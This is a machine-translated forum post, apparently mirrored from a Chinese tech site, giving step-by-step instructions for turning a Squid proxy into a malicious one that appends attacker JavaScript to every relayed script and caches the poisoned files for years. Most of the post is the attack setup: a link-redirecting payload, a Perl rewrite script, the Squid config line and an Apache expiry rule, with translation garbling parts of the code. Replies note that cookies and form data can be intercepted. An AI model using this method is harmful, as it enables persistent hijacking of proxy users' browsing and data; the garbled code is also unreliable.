Cet article est un article miroir de traduction automatique, veuillez cliquer ici pour accéder à l’article original.

Vue: 14819|Répondre: 3

[Communication sécurisée] Utiliser des serveurs proxy pour détourner les données privées des utilisateurs

[Copié le lien]
Publié sur 19/01/2015 02:34:56 | | | |
Ce post a été modifié pour la dernière fois par Mo Xiaowen le 07-06-2015 à 23:19


Cela peut se faire simplement en modifiant la configuration de SQUID
Qu’est-ce que SQUID ?
Squid est un logiciel qui met en cache les données Internet, reçoit les demandes de téléchargement des utilisateurs et traite automatiquement les données téléchargées. Lorsqu’un utilisateur souhaite télécharger une page d’accueil, il peut envoyer une requête à Squid, demander à Squid de la télécharger en son nom, puis Squid se connecte au site web et demande la page d’accueil, puis envoie la page d’accueil à l’utilisateur tout en gardant une sauvegarde ; lorsque d’autres utilisateurs demandent la même page, Squid envoie immédiatement la sauvegarde sauvegardée à l’utilisateur, afin que l’utilisateur ressente que la vitesse est assez rapide. Squid peut proxy des protocoles tels que HTTP, FTP, GOPHER, SSL et WAIS, et Squid peut le gérer automatiquement, et vous pouvez configurer Squid selon vos besoins pour filtrer les éléments indésirables.
Squid peut fonctionner dans de nombreux systèmes d’exploitation, tels qu’AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, etc.
La mise en œuvre est très simple :
1. Installer Squid sur un serveur Linux.
2. Modifier le code du serveur, insérer un morceau de notre code dans tout le javascript transmis et l’envoyer.
3. Régler le temps de cache de notre fichier js modifié aussi haut que possible.
Cette méthode s’applique également aux sites web avec SSL activé : si le site charge une ressource non sécurisée (comme jquery pour un site HTTP), la plupart des navigateurs donneront un avertissement, mais peu de gens y prêtent attention.
Chema a dit que plus de 5 000 personnes ont utilisé son proxy quelques jours après sa sortie, et que la plupart des gens l’ont utilisé pour faire de mauvaises actions, car ils l’ont utilisé, donc ils pensaient que c’était anonyme et sûr, mais ils ne s’attendaient pas à ce que le serveur proxy fasse aussi de mauvaises choses.
Créez votre serveur proxy malveillant
Si vous avez déjà un serveur proxy Squid, vous aurez aussi besoin d’un serveur web comme Apache.
Étape 1 Créer une charge utile
J’utilise un script simple comme démonstration pour orienter tous les hyperliens vers mon site web.
/etc/squid/payload.js

[mw_shl_code=javascrip remove t, true]for(var i=0 ; i<document.getelementsbytagname('a').longueur ; i++)
document.getElementsByTagName('a').href = « https://blog.haschek.at » ; [/mw_shl_code]
Étape 2 : Écrire un script pour infecter tous les fichiers JS
/etc/squid/poison.pl
[mw_shl_code=perl,true]
# !/usr/bin/perl
$|=1 ;
$count = 0 ;
$pid = $$ ;
tandis que (<>)
{
  croquer $_ ;
  if($_ =- /(.*.js)/i)
  {
        $url = 1 $ ;
        system(« /usr/bin/wget », »-q », »-O »,"/var/www/tmp/$pid-$count.js »,"$url ») ;
        system(« chmod o+r /var/www/tmp/$pid-$count.js ») ;
        system(« chat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js ») ;
        imprimez « http://127.0.0.1:80/tmp/$pid-$count.js » ;
  }
  sinon
  {
        imprimez « $_ » ;
  }
$count++ ;
}[/mw_shl_code]
Ce script utilise wget pour obtenir le javascrip original de la page et supprimer le fichier t, puis ajouter le code dans /etc/squid/payload.js et envoyer le fichier modifié au client, tandis que vous devez créer le dossier /var/www/tmp et permettre à squid d’y écrire des fichiers. Ce répertoire stocke les fichiers js modifiés.


Étape 3 : Combinez le script ci-dessus avec Squid
Ajoutez-le dans /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Étape 4 : Faire en sorte que le cache ne faille jamais
/var/www/tmp/.htaccess
[mw_shl_code=html,true] Expiration Actif le
ExpirePar défaut « accès plus 3000 jours »[/mw_shl_code]
Cela indiquera à Apache de lui donner un délai d’expiration long jusqu’à ce que l’utilisateur nettoie son cache.


Si vous connectez ce proxy, cliquer sur un lien hypertexte vous redirigera vers mon site web, et le cache existera même si vous n’utilisez pas le proxy plus tard. J’ai simplement utilisé une charge utile non agressive, et avec cette méthode, les hackers peuvent faire bien plus. Alors, rappelez-vous à vous et à vos amis d’être prudents avec l’utilisation de proxies gratuites.





Précédent:Des milliers de matériaux transparents FLASH
Prochain:Les machines Android passent iPhone et iPad en quelques minutes (super facile)
Publié sur 19/01/2015 08:48:45 |
Oui, toutes les données d’accès peuvent être interceptées par le serveur proxy, y compris les soumissions post-get, alors comment la confidentialité peut-elle être rétablie ?
Publié sur 19/01/2015 09:53:53 |
Peuvent-ils intercepter mes cookies ?
 Propriétaire| Publié sur 20/01/2015 14:36:06 |
Wu Soft Inquiry Group Publié le 19-01-2015 à 09:53
Peuvent-ils intercepter mes cookies ?

Oui                                             
Démenti:
Tous les logiciels, supports de programmation ou articles publiés par Code Farmer Network sont uniquement destinés à l’apprentissage et à la recherche ; Le contenu ci-dessus ne doit pas être utilisé à des fins commerciales ou illégales, sinon les utilisateurs assumeront toutes les conséquences. Les informations sur ce site proviennent d’Internet, et les litiges de droits d’auteur n’ont rien à voir avec ce site. Vous devez supprimer complètement le contenu ci-dessus de votre ordinateur dans les 24 heures suivant le téléchargement. Si vous aimez le programme, merci de soutenir un logiciel authentique, d’acheter l’immatriculation et d’obtenir de meilleurs services authentiques. En cas d’infraction, veuillez nous contacter par e-mail.

Mail To:help@itsvse.com